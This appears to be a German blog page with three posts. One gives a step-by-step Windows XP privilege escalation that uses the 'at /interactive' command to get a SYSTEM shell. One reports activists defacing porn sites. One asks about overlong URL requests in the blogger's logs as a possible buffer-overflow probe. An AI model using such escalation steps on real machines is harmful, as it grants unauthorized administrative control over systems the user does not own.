Soeben lese ich über eine recht interessante Methode, sich unter Windows XP mit Administrator-Rechten auszustatten. Interessant in erster Linie aus einem Grund: Es ist sowas von einfach, dass es fast schon wieder unglaublich ist. Hier eine Step-by-Step Anleitung – einzige Vorraussetzung: Der Benutzer mit eingeschränkten Rechten hat zumindest Zugriff auf den „at“-Befehl.

• Eingabeaufforderung öffnen (Start -> Ausführen -> cmd.exe)
• In dieser Eingabeaufforderung einen Task wie folgt (Uhrzeit anpassen) planen: at 20:00 /intereactive “cmd.exe”
• Abwarten, bis das neue Fenster geöffnet wird
• die erste Eingabeaufforderung schliessen, mit dem Task-Manager (Strg+Shift+Esc) die explorer.exe beenden
• in der noch geöffneten Eingabeaufforderung ins Verzeichnis C:\Windows wechseln und dort explorer.exe starten
• Fertig, ihr seid mit dem Benutzer „SYSTEM“ angemeldet

Ich bin ehrlich gesagt etwas baff, hab auch keine Ahnung, wie alt dieser Exploit schon ist, aber in meinen Augen ist es ein Kinderspiel, in dieser Form zu erweiterten Rechten auf einem Windows XP System zu kommen. Gelesen habe ich eben davon auf haha.nu und es gibt auch ein Demonstrationsvideo dieses Exploits.

Die Verschwendung von Sperma ist ein Gesetzesverstoß, „der vielen Menschen den Tod, Probleme und Unheil gebracht hat“. Das muss bestraft werden. Mit aller Härte. Indem man Pr0n-Seiten hackt und sämtliche anregenden abstoßenden Bildchen durch die eines weise vor sich hin lächelnden Rabis ersetzt. Das ist zumindest das Ziel einer Gruppe ultra-orthodoxer Juden, die damit begonnen haben, israelische Pr0n-Seiten zu cracken verschönern.

Stelle mir grad vor, dass jemand aufgrund von „Autoerotik“ vor Gericht gestellt werden könnte…;) Die Beweisaufnahme stell ich mir interessant vor.
Mehr dazu in der Netzeitung

Seit ein paar Tagen tauchen in meinem Log hier recht ungewöhnliche Zugriffsversuche auf. Hunderte von Anfragen, meist innerhalb weniger Minuten kommen hier an, es sind Zugriffen auf nicht existierende URLs und sie fallen auf, weil sie sich aus extrem langen Pfadangaben zusammensetzen. Die sehen zum Beispiel so aus (zum Teil noch wesentlich länger):

http://www.xsized.de/photoshop-tutorial-selektives-
scharfen/feed:http://www.xsized.de/comments/feed/fe
ed:http://www.xsized.de/comments/feed/feed:http://t
agg.selfip.com/blog/feed/feed:http://www.xsized.de/
feed/">http://www.xsized.de/photoshop-tutorial-sele
ktives-scharfen/feed:http://www.xsized.de/comments/
feed/feed:http://www.xsized.de/comments/feed/feed:h
ttp://www.xsized.de/feed/feed:http://tagg.selfip.co
m/blog/feed/

Eigenartig, oder? Ich hab keine Ahnung, wo diese Zugriffe herkommen, an die echten Logdateien komme ich im Moment nicht heran und das Auswertungstool, welches ich hier verwende, zerstückelt extakt die Adressen, von denen diese Anfragen kommen. Irgendwie wirkt das ganze zumindest im Moment auf mich, als würde jemand (bzw. ein Tool) gezielt nach Schwachstellen suchen und versuchen, einen Buffer Overflow zu generieren. Ich habe bislang noch keine Stelle gefunden, an der eventuell ein Plugin oder WordPress selbst vielleicht einen fehlerhaften Link in dieser Form generieren würde, zudem sehe ich für diese Anfragen auch keine verweisenden Seiten, sie scheinen also direkt abgerufen zu werden.

Meine Versuche, die ich mit diesen URLs angestellt habe, zeigen mir im Moment auch keine Probleme, diese Anfragen scheinen derzeit nichts zu bewirken, lediglich die 404-Seite wird angezeigt. Trotzdem lässt die aktuelle Häufung bei mir ein wenig die Alarmglocken klingeln. Sind derartige Zugriffsversuche schon anderen aufgefallen? Ist irgendein Fehler im aktuellen WordPress, in PHP oder beim Apache bekannt, der sich durch Aufrufe überlanger URLs ausnutzen liesse? Werde selbst noch einmal recherchieren, aber vielleicht ist da ja jemandem etwas bekannt. Würde mich über Hinweise freuen.